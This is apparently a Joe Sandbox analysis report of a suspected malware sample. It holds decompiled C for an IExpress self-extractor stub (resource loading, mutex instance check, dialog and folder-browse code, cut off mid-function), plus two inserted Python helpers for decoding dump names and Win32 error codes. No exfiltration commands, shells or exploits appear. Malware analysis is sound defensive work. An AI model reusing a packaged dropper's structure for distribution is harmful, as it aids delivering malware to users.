                                                                                                                                                                                                    0x00fd3372
                                                                                                                                                                                                    0x00fd32fc
                                                                                                                                                                                                    0x00fd3301
                                                                                                                                                                                                    0x00fd3301
                                                                                                                                                                                                    0x00fd3303
                                                                                                                                                                                                    0x00fd3304
                                                                                                                                                                                                    0x00fd3304
                                                                                                                                                                                                    0x00fd330a
                                                                                                                                                                                                    0x00fd330d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3313
                                                                                                                                                                                                    0x00fd3318
                                                                                                                                                                                                    0x00fd331a
                                                                                                                                                                                                    0x00fd3331
                                                                                                                                                                                                    0x00fd3332
                                                                                                                                                                                                    0x00fd333a
                                                                                                                                                                                                    0x00fd333d
                                                                                                                                                                                                    0x00fd337c
                                                                                                                                                                                                    0x00fd3388
                                                                                                                                                                                                    0x00fd338f
                                                                                                                                                                                                    0x00fd3394
                                                                                                                                                                                                    0x00fd3396
                                                                                                                                                                                                    0x00fd33a4
                                                                                                                                                                                                    0x00fd33ab
                                                                                                                                                                                                    0x00fd33b6
                                                                                                                                                                                                    0x00fd33be
                                                                                                                                                                                                    0x00fd33c3
                                                                                                                                                                                                    0x00fd33c5
                                                                                                                                                                                                    0x00fd3435
                                                                                                                                                                                                    0x00fd3437
                                                                                                                                                                                                    0x00fd3437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3437
                                                                                                                                                                                                    0x00fd33c7
                                                                                                                                                                                                    0x00fd33c9
                                                                                                                                                                                                    0x00fd33cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd33cc
                                                                                                                                                                                                    0x00fd33ad
                                                                                                                                                                                                    0x00fd33b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd33b4
                                                                                                                                                                                                    0x00fd3398
                                                                                                                                                                                                    0x00fd3399
                                                                                                                                                                                                    0x00fd339b
                                                                                                                                                                                                    0x00fd339c
                                                                                                                                                                                                    0x00fd339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd339d
                                                                                                                                                                                                    0x00fd334c
                                                                                                                                                                                                    0x00fd3351
                                                                                                                                                                                                    0x00fd3354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd335c
                                                                                                                                                                                                    0x00fd3362
                                                                                                                                                                                                    0x00fd3364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3366
                                                                                                                                                                                                    0x00fd3367
                                                                                                                                                                                                    0x00fd3369
                                                                                                                                                                                                    0x00fd336a
                                                                                                                                                                                                    0x00fd336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd336b
                                                                                                                                                                                                    0x00fd331c
                                                                                                                                                                                                    0x00fd3323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3329
                                                                                                                                                                                                    0x00fd332b
APIs
• LoadStringA.USER32(000003E8,00FD8598,00000200), ref: 00FD3271
• GetDesktopWindow.USER32 ref: 00FD33E2
• SetWindowTextA.USER32(?,nst0dum), ref: 00FD33F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00FD3410
• GetDlgItem.USER32(?,00000836), ref: 00FD3426
• EnableWindow.USER32(00000000), ref: 00FD342D
• EndDialog.USER32(?,00000000), ref: 00FD343F
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$nst0dum
• API String ID: 2418873061-2261383228
• Opcode ID: 92f72968c784f9d81de769ac5fc7748fd0477d08c71a6618695c17ebb7e08bee
• Instruction ID: 2b9adf28eb98fde611ccab4a49d74da753fd26547b77ab3b17d8e89fade0e186
• Opcode Fuzzy Hash: 92f72968c784f9d81de769ac5fc7748fd0477d08c71a6618695c17ebb7e08bee
• Instruction Fuzzy Hash: 1951483178224577EB21AB755C4CF7B3A4B9B46B61F1C402BF745963C0CAB98A01B267
Uniqueness
Uniqueness Score: -1.00%
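The memory-dump list above names five regions of the same image; only the one at 0x00FD1000 with protection 0x20 holds executable pages, which is why that dump is the source of the disassembly. The following helper decodes those names so an analyst can pick the code-bearing dump without opening each one. It is an added example, not part of the Joe Sandbox report or its tooling. The field layout is inferred from the names on this page: the base-address field agrees with "Offset: 00FD0000", the protection field with the Windows PAGE_* constants and the type field with MEM_IMAGE; reading the first field as the process id (3, matching the hcaresult_3_2 snapshot name) is an assumption, and the remaining fields are left undecoded.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows memory protection constants (winnt.h); the low byte of PAGE_* values.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout, inferred from the dump names on this report page:
#   <proc>.<run>.<seq>.<base address>.<protection>.<field6>.<memory type>.<field8>.sdmp
# Only base address, protection and memory type are decoded; proc=pid is an assumption.
DUMP_NAME_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<seq>[0-9]+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<field6>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<field8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpInfo:
    name: str
    proc: int
    base: int
    protect: int
    mem_type: int

    @property
    def protection(self) -> str:
        main = PAGE_PROTECTION.get(self.protect & 0xFF, f"UNKNOWN(0x{self.protect & 0xFF:x})")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([main] + mods)

    @property
    def executable(self) -> bool:
        # Every PAGE_EXECUTE* value sets a bit in the high nibble of the low byte.
        return bool(self.protect & 0xF0)

    @property
    def memory_type(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"UNKNOWN(0x{self.mem_type:x})")


def parse_dump_name(name: str) -> Optional[DumpInfo]:
    """Parse one .sdmp file name; returns None if it does not match the assumed layout."""
    m = DUMP_NAME_RE.match(name.strip())
    if not m:
        return None
    return DumpInfo(
        name=name,
        proc=int(m["proc"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["memtype"], 16),
    )


def code_dumps(names: List[str]) -> List[DumpInfo]:
    """Return the dumps that hold executable pages, lowest base address first."""
    infos = [d for d in (parse_dump_name(n) for n in names) if d is not None]
    return sorted((d for d in infos if d.executable), key=lambda d: d.base)


# The five dump names exactly as listed on this page.
REPORT_DUMPS = [
    "00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp",
    "00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp",
    "00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp",
    "00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp",
    "00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp",
]

if __name__ == "__main__":
    for d in (parse_dump_name(n) for n in REPORT_DUMPS):
        print(f"proc={d.proc} base=0x{d.base:08x} {d.protection:<22} {d.memory_type}")
    print("executable dumps:", [hex(d.base) for d in code_dumps(REPORT_DUMPS)])
```

Run against the five names, the only executable region is the 0x00FD1000 dump (PAGE_EXECUTE_READ, MEM_IMAGE); 0x00FD0000 is the read-only PE header and 0x00FD8000 is the read/write data region, which is where the listing below reads its stack cookie from (0xfd8004).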

C-Code - Quality: 93%
// Decompiled initialisation routine. The named resources it reads (TITLE, EXTRACTOPT,
// INSTANCECHECK, VERCHECK) and the IXP003.TMP temp directory seen above are characteristic
// of the IExpress self-extractor stub (wextract), i.e. the packaging layer around the
// dropped payload rather than the payload itself.
E00FD2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
    signed int _v8;
    char _v268;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t13;
    void* _t20;
    void* _t23;
    void* _t27;
    struct HRSRC__* _t31;
    intOrPtr _t33;
    void* _t43;
    void* _t48;
    signed int _t65;
    struct HINSTANCE__* _t66;
    signed int _t67;

    _t13 =  *0xfd8004; // 0x42de454f  MSVC /GS security cookie, stored in the RW data region
    _v8 = _t13 ^ _t67; // cookie XOR frame pointer, verified on function exit
    _t65 = 0;
    _t66 = __ecx; // module handle (HINSTANCE) of the stub
    _t48 = __edx;
     *0xfd9a3c = __ecx;
    // zero the global configuration and path buffers
    memset(0xfd9140, 0, 0x8fc);
    memset(0xfd8a20, 0, 0x32c);
    memset(0xfd88c0, 0, 0x104);
     *0xfd93ec = 1;
    // E00FD468F reads a named resource into a buffer; TITLE is mandatory and at most 0x7f bytes
    _t20 = E00FD468F("TITLE", 0xfd9154, 0x7f);
    if(_t20 == 0 || _t20 > 0x80) {
        _t64 = 0x4b1; // error string id shown via E00FD44B9 below
        goto L32;
    } else {
        _t27 = CreateEventA(0, 1, 1, 0); // manual-reset event, initially signalled
         *0xfd858c = _t27;
        SetEvent(_t27);
        _t64 = 0xfd9a34;
        // EXTRACTOPT: 4-byte option flags controlling the extraction behaviour
        if(E00FD468F("EXTRACTOPT", 0xfd9a34, 4) != 0) {
            if(( *0xfd9a34 & 0x000000c0) == 0) {
                L12:
                 *0xfd9120 =  *0xfd9120 & _t65;
                if(E00FD5C9E(_t48, _t48, _t65, _t66) != 0) {
                    if( *0xfd8a3a == 0) {
                        _t31 = FindResourceA(_t66, "VERCHECK", 0xa); // type 10 = RT_RCDATA
                        if(_t31 != 0) {
                            _t65 = LoadResource(_t66, _t31);
                        }
                        if( *0xfd8184 != 0) {
                            __imp__#17(); // call through an ordinal-17 import; the module is not shown in this excerpt
                        }
                        if( *0xfd8a24 == 0) {
                            _t57 = _t65;
                            if(E00FD36EE(_t65) == 0) {
                                goto L33;
                            } else {
                                _t33 =  *0xfd9a40; // 0x3
                                _t48 = 1;
                                if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                    if(( *0xfd9a34 & 0x00000100) == 0 || ( *0xfd8a38 & 0x00000001) != 0 || E00FD18A3(_t64, _t66) != 0) {
                                        goto L30;
                                    } else {
                                        _t64 = 0x7d6;
                                        // E00FD6517 runs a dialog (procedure E00FD19E0); 0x83d is the expected result code
                                        if(E00FD6517(_t57, 0x7d6, _t34, E00FD19E0, 0x547, 0x83e) != 0x83d) {
                                            goto L33;
                                        } else {
                                            goto L30;
                                        }
                                    }
                                } else {
                                    L30:
                                    _t23 = _t48;
                                }
                            }
                        } else {
                            _t23 = 1;
                        }
                    } else {
                        E00FD2390(0xfd8a3a);
                        goto L33;
                    }
                } else {
                    _t64 = 0x520;
                    L32:
                    // error dialog with string-table id _t64; 0x10 = MB_ICONERROR (parameters follow the MessageBox pattern)
                    E00FD44B9(0, _t64, 0, 0, 0x10, 0);
                    goto L33;
                }
            } else {
                // single-instance check: the mutex name comes from the INSTANCECHECK resource
                _t64 =  &_v268;
                if(E00FD468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                    goto L3;
                } else {
                    _t43 = CreateMutexA(0, 1,  &_v268);
                     *0xfd8588 = _t43;
                    // 0xb7 = ERROR_ALREADY_EXISTS: another instance already owns the mutex
                    if(_t43 == 0 || GetLastError() != 0xb7) {
                        goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(( *0xfd9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                    										if(E00FD44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                    										E00FD44B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										CloseHandle( *0xfd8588);
                                                                                                                                                                                                    										 *0xfd9124 = 0x800700b7;
                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                    						E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                    			}
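The decompiled function above keys its single-instance check on a few Win32 error values: `GetLastError() == 0xb7` after `CreateMutexA`, and the HRESULTs `0x800700b7` and `0x80070714` it stores at `0xfd9124` on the "already running" and "resource missing" paths. The following Python is an added analyst helper, not part of the Joe Sandbox report or of the sample: it reproduces the `HRESULT_FROM_WIN32` encoding from winerror.h so those constants can be named, and mirrors the handle/last-error branch of the mutex check. The function names and the small error-name table are the editor's own; the numeric values come from the Win32 SDK.

```python
"""Name the Win32 error values used by the decompiled instance check.

Added example for the listing above; not code from the report or the sample.
"""

FACILITY_WIN32 = 7
SEVERITY_ERROR = 0x80000000

# Win32 error codes seen in the listing (values as defined in winerror.h).
WIN32_ERROR_NAMES = {
    0x0B7: "ERROR_ALREADY_EXISTS",          # 183: CreateMutexA opened an existing mutex
    0x714: "ERROR_RESOURCE_DATA_NOT_FOUND",  # 1812: resource lookup (INSTANCECHECK/TITLE) failed
}


def hresult_from_win32(code: int) -> int:
    """Port of the HRESULT_FROM_WIN32 macro: wrap a Win32 error in FACILITY_WIN32."""
    if code <= 0:
        return code & 0xFFFFFFFF  # already an HRESULT (or success); returned unchanged
    return ((code & 0xFFFF) | (FACILITY_WIN32 << 16) | SEVERITY_ERROR) & 0xFFFFFFFF


def decode_hresult(hr: int):
    """Split an HRESULT into (failed, facility, code) per the HRESULT bit layout."""
    hr &= 0xFFFFFFFF
    failed = bool(hr & SEVERITY_ERROR)
    facility = (hr >> 16) & 0x7FF   # bits 26..16
    code = hr & 0xFFFF              # bits 15..0
    return failed, facility, code


def describe(hr: int) -> str:
    """Human-readable label for an HRESULT, naming FACILITY_WIN32 codes we know."""
    failed, facility, code = decode_hresult(hr)
    if facility == FACILITY_WIN32:
        name = WIN32_ERROR_NAMES.get(code, "unknown Win32 error")
        return f"0x{hr & 0xFFFFFFFF:08X}: HRESULT_FROM_WIN32({code}) = {name}"
    status = "failure" if failed else "success"
    return f"0x{hr & 0xFFFFFFFF:08X}: facility {facility}, code {code}, {status}"


def classify_mutex_result(handle: int, last_error: int) -> str:
    """Mirror the branch after CreateMutexA in the listing.

    A NULL handle or any GetLastError other than 0xb7 takes the `goto L12`
    path (treated as the first instance); a valid handle with
    ERROR_ALREADY_EXISTS means another instance already owns the mutex.
    """
    if handle == 0 or last_error != 0xB7:
        return "first-instance"
    return "already-running"


if __name__ == "__main__":
    for hr in (0x800700B7, 0x80070714):
        print(describe(hr))
    print(classify_mutex_result(0x1234, 0xB7))
```

Running the block prints the two stored HRESULTs with their Win32 names; `describe` falls back to a raw facility/code breakdown for values outside FACILITY_WIN32 so it can be pointed at other constants pulled from a listing.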


Instruction address column for the decompiled lines above (originally rendered beside the listing), spanning 0x00fd2cb5 to 0x00fd2f18.

APIs
• memset.MSVCRT ref: 00FD2CD9
• memset.MSVCRT ref: 00FD2CE9
• memset.MSVCRT ref: 00FD2CF9
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
  • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
  • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
  • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
  • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
  • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2DBD
• CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2E0A
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
• API String ID: 1002816675-1021407552
• Opcode ID: e08fde0187631023c6d292991728c43010230e686c0d855b2a67107e9652f369
• Instruction ID: d930bd60a2f1086178eae613ef748856dad270488fa9511672b207470846cdc5
• Opcode Fuzzy Hash: e08fde0187631023c6d292991728c43010230e686c0d855b2a67107e9652f369
• Instruction Fuzzy Hash: 585126717053056BE7A0B7B09C4AB3A339BEB61710F0C402BB941C53D1DAB88841FA96
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
E00FD34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0xfd91d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		 *0xfd8584 = _t35;
		E00FD43D0(_t35, GetDesktopWindow());
		__eflags =  *0xfd8184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "nst0dum");
		_t17 = CreateThread(0, 0, E00FD4FE0, 0, 0, 0xfd8798);
		 *0xfd879c = _t17;
		__eflags = _t17;
		if(_t17 != 0) {
			goto L22;
		} else {
			E00FD44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
			_push(0);
			_push(_t35);
			goto L21;
		}
	}
	_t23 = _t13 - 1;
	if(_t23 == 0) {
		__eflags = _a12 - 2;
		if(_a12 != 2) {
			goto L22;
		}
		ResetEvent( *0xfd858c);
		_t38 =  *0xfd8584; // 0x0
		_t25 = E00FD44B9(_t38, 0x4b2, 0xfd1140, 0, 0x20, 4);
		__eflags = _t25 - 6;
		if(_t25 == 6) {
			L11:
			 *0xfd91d8 = 1;
			SetEvent( *0xfd858c);
			_t39 =  *0xfd879c; // 0x0
			E00FD3680(_t39);
			_push(0);
			goto L20;
		}
		__eflags = _t25 - 1;
		if(_t25 == 1) {
			goto L11;
		}
		SetEvent( *0xfd858c);
		goto L22;
	}
	if(_t23 == 0xe90) {
		TerminateThread( *0xfd879c, 0);
		EndDialog(_a4, _a12);
		return 1;
	}
	return 0;
}

0x00fd34fb
0x00fd34fe
0x00fd3665
0x00fd3666
0x00fd3666
0x00fd3668
0x00fd366e
0x00fd366e
0x00fd3671
0x00fd3671
0x00fd3677
0x00000000
0x00fd3677
0x00fd3504
0x00fd3506
0x00fd3507
0x00fd350c
0x00fd365b
0x00fd365f
0x00000000
0x00000000
0x00000000
0x00fd3661
0x00fd3512
0x00fd3515
0x00fd35be
0x00fd35c1
0x00fd35d1
                                                                                                                                                                                                    0x00fd35d8
                                                                                                                                                                                                    0x00fd35de
                                                                                                                                                                                                    0x00fd35f8
                                                                                                                                                                                                    0x00fd3617
                                                                                                                                                                                                    0x00fd3617
                                                                                                                                                                                                    0x00fd3623
                                                                                                                                                                                                    0x00fd3637
                                                                                                                                                                                                    0x00fd363d
                                                                                                                                                                                                    0x00fd3642
                                                                                                                                                                                                    0x00fd3644
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3646
                                                                                                                                                                                                    0x00fd3652
                                                                                                                                                                                                    0x00fd3657
                                                                                                                                                                                                    0x00fd3658
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3658
                                                                                                                                                                                                    0x00fd3644
                                                                                                                                                                                                    0x00fd351b
                                                                                                                                                                                                    0x00fd351d
                                                                                                                                                                                                    0x00fd354f
                                                                                                                                                                                                    0x00fd3553
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd355f
                                                                                                                                                                                                    0x00fd3565
                                                                                                                                                                                                    0x00fd357c
                                                                                                                                                                                                    0x00fd3581
                                                                                                                                                                                                    0x00fd3584
                                                                                                                                                                                                    0x00fd359b
                                                                                                                                                                                                    0x00fd35a1
                                                                                                                                                                                                    0x00fd35a7
                                                                                                                                                                                                    0x00fd35ad
                                                                                                                                                                                                    0x00fd35b3
                                                                                                                                                                                                    0x00fd35b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd35b8
                                                                                                                                                                                                    0x00fd3586
                                                                                                                                                                                                    0x00fd3588
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3590
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3590
                                                                                                                                                                                                    0x00fd3524
                                                                                                                                                                                                    0x00fd3535
                                                                                                                                                                                                    0x00fd3541
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3549
                                                                                                                                                                                                    0x00000000

APIs
• TerminateThread.KERNEL32(00000000), ref: 00FD3535
• EndDialog.USER32(?,?), ref: 00FD3541
• ResetEvent.KERNEL32 ref: 00FD355F
• SetEvent.KERNEL32(00FD1140,00000000,00000020,00000004), ref: 00FD3590
• GetDesktopWindow.USER32 ref: 00FD35C7
• GetDlgItem.USER32(?,0000083B), ref: 00FD35F1
• SendMessageA.USER32(00000000), ref: 00FD35F8
• GetDlgItem.USER32(?,0000083B), ref: 00FD3610
• SendMessageA.USER32(00000000), ref: 00FD3617
• SetWindowTextA.USER32(?,nst0dum), ref: 00FD3623
• CreateThread.KERNEL32 ref: 00FD3637
• EndDialog.USER32(?,00000000), ref: 00FD3671
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
• String ID: nst0dum
• API String ID: 2406144884-432003757
• Opcode ID: 99fbb03ff233ddb8f9af7adec5c3786944c8e031aa6d5ffe680d9ec59929e628
• Instruction ID: 541e6a44d188d6a80ab3aac21241782a2bcc62d8316eeb16bf1ec8b03e5c7002
• Opcode Fuzzy Hash: 99fbb03ff233ddb8f9af7adec5c3786944c8e031aa6d5ffe680d9ec59929e628
• Instruction Fuzzy Hash: A731C271201209BBD7201B35EC0DF2A3B6BE785B51F1C4417F702913A0CB75DA01FA5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
E00FD4224(char __ecx) {
	char* _v8;
	_Unknown_base(*)()* _v12;
	_Unknown_base(*)()* _v16;
	_Unknown_base(*)()* _v20;
	char* _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	intOrPtr _v40;
	char _v44;
	char _v48;
	char _v52;
	_Unknown_base(*)()* _t26;
	_Unknown_base(*)()* _t28;
	_Unknown_base(*)()* _t29;
	_Unknown_base(*)()* _t32;
	char _t42;
	char* _t44;
	char* _t61;
	void* _t63;
	char* _t65;
	struct HINSTANCE__* _t66;
	char _t67;
	void* _t71;
	char _t76;
	intOrPtr _t85;

	_t67 = __ecx;
	_t66 = LoadLibraryA("SHELL32.DLL");
	if(_t66 == 0) {
		_t63 = 0x4c2;
		L22:
		E00FD44B9(_t67, _t63, 0, 0, 0x10, 0);
		return 0;
	}
	_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
	_v12 = _t26;
	if(_t26 == 0) {
		L20:
		FreeLibrary(_t66);
		_t63 = 0x4c1;
		goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0xfd88c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0xfd87a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0xfd8598;
		_v36 = 1;
		_v32 = E00FD4200;
                                                                                                                                                                                                    					_v28 = 0xfd88c0;
                                                                                                                                                                                                    					 *0xfda288( &_v52);
                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						 *0xfda288(_t32, 0xfd88c0);
                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *0xfd88c0 != 0) {
                                                                                                                                                                                                    							E00FD1680(0xfd87a0, 0x104, 0xfd88c0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0xfda288(_v12);
                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t85 =  *0xfd87a0; // 0x0
                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetTempPathA(0x104, 0xfd88c0);
